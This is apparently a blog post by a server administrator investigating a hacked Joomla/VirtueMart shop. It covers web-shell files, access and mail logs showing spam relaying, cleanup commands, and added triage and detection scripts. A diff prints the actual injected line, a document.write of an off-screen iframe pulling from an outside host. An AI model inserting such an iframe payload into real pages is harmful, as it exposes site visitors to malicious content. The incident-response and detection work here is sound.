Today I found some strange files on the server:
root@gate:/home# find . -name 'statisticsIjod.php'
./beauty/www/images/stories/wlw/statisticsIjod.php
./beauty/www/images/stories/soap/statisticsIjod.php
./beauty/www/images/stories/fruit/statisticsIjod.php
./beauty/www/images/stories/statisticsIjod.php
./beauty/www/images/stories/food/statisticsIjod.php
These files were created one per minute:
root@gate:/home# ll ./beauty/www/images/stories/wlw/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:30 ./beauty/www/images/stories/wlw/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/soap/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:29 ./beauty/www/images/stories/soap/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/fruit/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:28 ./beauty/www/images/stories/fruit/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:26 ./beauty/www/images/stories/statisticsIjod.php
root@gate:/home# ll ./beauty/www/images/stories/food/statisticsIjod.php
-rw------- 1 nobody beauty 6987 Dec 19 21:27 ./beauty/www/images/stories/food/statisticsIjod.php
which is rather strange.
Obviously these files were created by some PHP script: they are owned by user nobody (the web server's PHP process) and group beauty. Judging by the contents, the script can be used to send spam.
There is no trace of it in the nginx logs:
root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log
root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log.1
But there is a file guestbook5Su.php sitting next to it, and that one does show up:
80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"
Somebody is hitting this file constantly from different IP addresses:
65.35.164.12 - - [07/Jan/2013:14:07:44 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 74 "-" "Mozilla/5.0"
2.134.254.42 - - [07/Jan/2013:14:07:45 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 82 "-" "Mozilla/5.0"
94.159.191.212 - - [07/Jan/2013:14:07:46 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
189.149.33.174 - - [07/Jan/2013:14:10:54 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
41.72.103.22 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
95.56.138.120 - - [07/Jan/2013:14:12:06 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 379 "-" "Mozilla/5.0"
93.145.93.239 - - [07/Jan/2013:14:12:58 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 383 "-" "Mozilla/5.0"
94.20.154.186 - - [07/Jan/2013:14:13:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 86 "-" "Mozilla/5.0"
83.50.238.68 - - [07/Jan/2013:14:13:20 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0"
88.184.236.194 - - [07/Jan/2013:14:13:24 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0"
41.133.201.160 - - [07/Jan/2013:14:13:28 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
196.12.228.197 - - [07/Jan/2013:14:13:50 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"
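The pattern above (POSTs to a .php file under /images/, empty referer, bare "Mozilla/5.0" agent, a different source IP almost every time) is easy to pull out of the whole access log with awk instead of reading it by eye. The following is an added example, not a script from the original post: the sample_log lines are a handful copied from the excerpt above plus one constructed benign image request (198.51.100.7 is a documentation address), and on the server you would run the functions on beauty.access.log instead.

```shell
#!/bin/sh
# Added example: triage an nginx access log for a web shell driven from many IPs.
# Log format assumed: nginx "combined" (IP, -, -, [time, zone], "METHOD path proto", status, ...).

# Sample data: lines from the excerpt above plus one constructed benign request.
sample_log() {
cat <<'EOF'
80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"
65.35.164.12 - - [07/Jan/2013:14:07:44 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 74 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"
92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Jan/2013:14:12:00 +0400] "GET /images/stories/docs/kastorovoe-maslo.png HTTP/1.1" 200 8192 "http://beauty.example/" "Mozilla/5.0 (Windows NT 6.1)"
EOF
}

# Requests for PHP under /images/: Joomla keeps only media there, so any hit
# is worth a look. Output: "<distinct IPs> <requests> <METHOD> <path>",
# most-distributed first. Reads the files given as arguments, or stdin.
php_under_images() {
    awk '$7 ~ /^\/images\/.*\.php/ {
            key = $6 " " $7; sub(/^"/, "", key)
            n[key]++
            if (!((key, $1) in seen)) { seen[key, $1] = 1; ips[key]++ }
         }
         END { for (k in n) print ips[k], n[k], k }' "$@" | sort -rn
}

# First and last request time for one path: the window to line up against
# mail.log when reconstructing when the spam run started and stopped.
hit_window() {
    path=$1; shift
    awk -v p="$path" '$7 == p { t = substr($4, 2); if (first == "") first = t; last = t }
                      END { if (first != "") print first, last }' "$@"
}

# Demo against the sample lines (on the server: php_under_images beauty.access.log*).
echo "PHP requested under /images/:"
sample_log | php_under_images
echo "Activity window for guestbook5Su.php:"
sample_log | hit_window /images/stories/guestbook5Su.php
```

Run it over both beauty.access.log and beauty.access.log.1; the first timestamp hit_window prints is the earliest evidence of the shell being used, which is what you compare with the mtime of the dropped files and the first spam entry in mail.log.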
And judging by what is in /var/log/mail.log, somebody is happily sending spam through sendmail:
Jan 7 13:27:29 gate sm-mta[12491]: r079RPmg012489: r079RTmg012491: DSN: Service unavailable
Jan 7 13:27:29 gate sm-mta[12491]: r079RTmg012491: to=<thelma_bridges@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as 1503BC8AF9)
Jan 7 13:31:53 gate sm-mta[12532]: r079VoJI012532: from=<marylou_stanley@milomag.ru>, size=525, class=0, nrcpts=1, msgid=<10abfc1-3210c-f9@milomag.ru>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]
Jan 7 13:31:56 gate sm-mta[12534]: r079VoJI012532: to=<potta2k6@hotmail.co>, delay=00:00:04, xdelay=00:00:03, mailer=relay, pri=120525, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=5.1.7, stat=Service unavailable
Jan 7 13:31:56 gate sm-mta[12534]: r079VoJI012532: r079VuJI012534: DSN: Service unavailable
Jan 7 13:31:56 gate sm-mta[12534]: r079VuJI012534: to=<marylou_stanley@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as F0BDBC7A6F)
There are actually more suspicious files:
-rw-r--r-- 1 nobody beauty 6987 Dec 27 22:00 /home/beauty/www/images/stories/guestbook5Su.php
-rwxr-xr-x 1 nobody beauty 861 Dec 19 23:30 /home/beauty/www/images/stories/index.php*
-rw------- 1 nobody beauty 6987 Dec 19 21:26 /home/beauty/www/images/stories/statisticsIjod.php
-rw-r--r-- 1 nobody beauty 113 Dec 19 10:00 /home/beauty/www/images/stories/story.php
-rw-r--r-- 1 nobody beauty 11757 Dec 27 22:00 /home/beauty/www/images/stories/WMmain.php
Let's see what has changed in the filesystem over the last month:
root@gate:/home/beauty/www# find . -type f -mtime -30
./components/com_virtuemart/shop_image/product/_________________50ce299fdc14c.png
./components/com_virtuemart/shop_image/product/_________________50d3f152c1e11.png
./components/com_virtuemart/shop_image/product/resized/_________________50ce299fd6089_90x90.png
./components/com_virtuemart/shop_image/product/resized/_________________50d3f1526661a_90x90.png
./components/com_virtuemart/shop_image/JSCookTree.js
./images/stories/wlw/statisticsIjod.php
./images/stories/wlw/index.php
./images/stories/story.php
./images/stories/WMmain.php
./images/stories/soap/statisticsIjod.php
./images/stories/soap/index.php
./images/stories/.cache_ut1x50.php
./images/stories/fruit/statisticsIjod.php
./images/stories/fruit/index.php
./images/stories/a7XJ.html
./images/stories/guestbook5Su.php
./images/stories/docs/kastorovoe-maslo.png
./images/stories/docs/maslo-kakao-nerafinirovannoe.jpg
./images/stories/statisticsIjod.php
./images/stories/food/statisticsIjod.php
./images/stories/food/index.php
./images/stories/index.php
so exactly these files, plus some JSCookTree.js that was modified today:
root@gate:/home/beauty/www# ll ./components/com_virtuemart/shop_image/JSCookTree.js
-rw-rw-r-- 1 beauty beauty 21490 Jan 7 14:34 ./components/com_virtuemart/shop_image/JSCookTree.js
Let's see what is inside:
root@gate:/home/beauty/www# find . -iname 'JSCookTree.js'
./components/com_virtuemart/shop_image/JSCookTree.js
./modules/mod_virtuemart/JSCookTree.js
root@gate:/home/beauty/www# diff ./components/com_virtuemart/shop_image/JSCookTree.js ./modules/mod_virtuemart/JSCookTree.js
860d859
< ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://exiryji.qhigh.com/945051d6f67c98d01b760e3d07b9b.dwFS0?13" height="500" width="500"></iframe>');
\ No newline at end of file
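The diff works because a pristine copy of JSCookTree.js happened to exist in modules/mod_virtuemart; the tell-tale of the injection itself is an iframe positioned off-screen (left:-550px) written with document.write(). Below is an added example, not from the original post, that does both checks over a whole tree: it flags .js files containing a hidden-iframe document.write() and, where a pristine copy exists, lists the lines present only in the deployed file. The two sample files and the http://example.invalid URL are constructed; only the style attribute is modelled on the payload above.

```shell
#!/bin/sh
# Added example: find JavaScript files carrying an appended hidden iframe and
# show what a deployed file has that its pristine copy does not.
# Sample files are constructed stand-ins, not the real JSCookTree.js.

make_sample_js() {
    dir=$(mktemp -d)
    # Clean script (stand-in for modules/mod_virtuemart/JSCookTree.js).
    printf 'function ctree() { return 1; }\n' > "$dir/clean.js"
    # Infected copy: same code plus a one-line payload appended (placeholder URL).
    cp "$dir/clean.js" "$dir/infected.js"
    cat >> "$dir/infected.js" <<'EOF'
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://example.invalid/x" height="500" width="500"></iframe>');
EOF
    # Script that legitimately embeds a visible iframe: must not be flagged.
    printf 'document.write("<iframe src=\\"/video\\" width=\\"640\\" height=\\"360\\"></iframe>");\n' > "$dir/player.js"
    printf '%s\n' "$dir"
}

# Flag .js files that document.write() an iframe which is pushed off-screen,
# hidden or zero-sized. Attack payloads hide the frame; player code does not.
hidden_iframe_js() {
    find "$1" -type f -name '*.js' -exec grep -lEi \
        'document\.write\(.*<iframe[^>]*(left:-|top:-|visibility:hidden|display:none|width="?0|height="?0)' {} + 2>/dev/null \
        | sort
}

# Lines present in the deployed file but not in the pristine copy
# (usage: added_lines DEPLOYED PRISTINE), i.e. what the manual diff above found.
added_lines() {
    diff "$2" "$1" | grep '^>' | sed 's/^> //' || true
}

# Demo against the constructed files.
D=$(make_sample_js)
echo "Files with a hidden iframe injection:"
hidden_iframe_js "$D"
echo "Lines added to infected.js relative to clean.js:"
added_lines "$D/infected.js" "$D/clean.js"
rm -rf "$D"
```

On the server, hidden_iframe_js /home/beauty/www covers the whole site, which matters here: the attacker had write access to the tree for at least three weeks, and the one modified today is not necessarily the only JavaScript that was touched.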
To start with, just delete everything:
rm ./components/com_virtuemart/shop_image/JSCookTree.js
rm ./images/stories/wlw/statisticsIjod.php ./images/stories/wlw/index.php
rm ./images/stories/story.php ./images/stories/WMmain.php ./images/stories/soap/statisticsIjod.php ./images/stories/soap/index.php ./images/stories/.cache_ut1x50.php ./images/stories/fruit/statisticsIjod.php ./images/stories/fruit/index.php ./images/stories/a7XJ.html ./images/stories/guestbook5Su.php ./images/stories/statisticsIjod.php ./images/stories/food/statisticsIjod.php ./images/stories/food/index.php ./images/stories/index.php
and make a note that today is 7 January 2013, and the last spam message was sent at Jan 7 14:38:44.
Clean the mail queue (http://www.cyberciti.biz/faq/linux-unix-bsd-clear-sendmail-queue/):
# cd /var/spool/mqueue/
# ls
# rm *
Links:
https://help.ubuntu.com/community/ClamAV
http://www.linuxquestions.org/questions/linux-newbie-8/free-anti-virus-for-ubuntu-925146/
http://sourceforge.net/projects/phpantivirus/ (this thing works, but finds nothing)
Here are some more strange files:
~$ ll www/components/com_virtuemart/shop_image/
total 92
drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 ./
drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ../
-rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 239ebaf5ed90010adb37827bf5909800.sess
-rw-r--r-- 1 nobody beauty 1611 Jan 11 19:06 4309e0e42cbf33088ba8d725194a146c.sess
-rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 61914ae25b970cf5ebc88220f5f64eed.sess
-rw-r--r-- 1 beauty beauty 1530 Dec 13 2011 733ffed41b5503bf962a250344f37181.sess
-rw-rw-r-- 1 beauty beauty 49 Nov 12 2005 blank.gif
drwxrwxr-x 3 beauty beauty 4096 Feb 26 08:22 category/
-rw-r--r-- 1 beauty beauty 1530 Sep 29 2011 dc9a7709a9cd72691a4fbe553476e0a9.sess
-rw-rw-r-- 1 beauty beauty 0 Jan 4 2007 index.html
drwxrwxr-x 3 beauty beauty 49152 Apr 2 17:48 product/
drwxrwxr-x 3 beauty beauty 4096 Feb 4 06:17 ps_image/
drwxrwxr-x 2 beauty beauty 4096 Feb 6 05:51 vendor/
$ ll www/components/com_virtuemart
total 84
drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ./
drwxr-xr-x 22 beauty beauty 4096 Aug 23 2012 ../
-rw-r--r-- 1 nobody beauty 297 Feb 1 00:28 34a44fb65e.php
-rw-r--r-- 1 nobody beauty 297 Feb 4 06:58 aef2d85b.php
-rw-r--r-- 1 nobody beauty 289 Dec 12 04:28 b1fdcd7.php
-rw-r--r-- 1 nobody beauty 289 Feb 4 23:01 c0875d1.php
-rw-r--r-- 1 beauty beauty 7678 Apr 10 2008 fetchscript.php
drwxr-xr-x 8 beauty beauty 4096 Jun 20 2011 js/
-rw-r--r-- 1 beauty beauty 10165 Oct 17 2011 router.php
drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 shop_image/
-rw-r--r-- 1 beauty beauty 5470 Feb 16 2009 show_image_in_imgtag.php
drwxr-xr-x 13 beauty beauty 4096 Oct 2 2010 themes/
-rw-r--r-- 1 beauty beauty 11674 Aug 15 2011 virtuemart_parser.php
-rw-r--r-- 1 beauty beauty 7378 Aug 15 2011 virtuemart.php
I deleted the strange files here.
Comment by admin — 13 April 2013 @ 10:44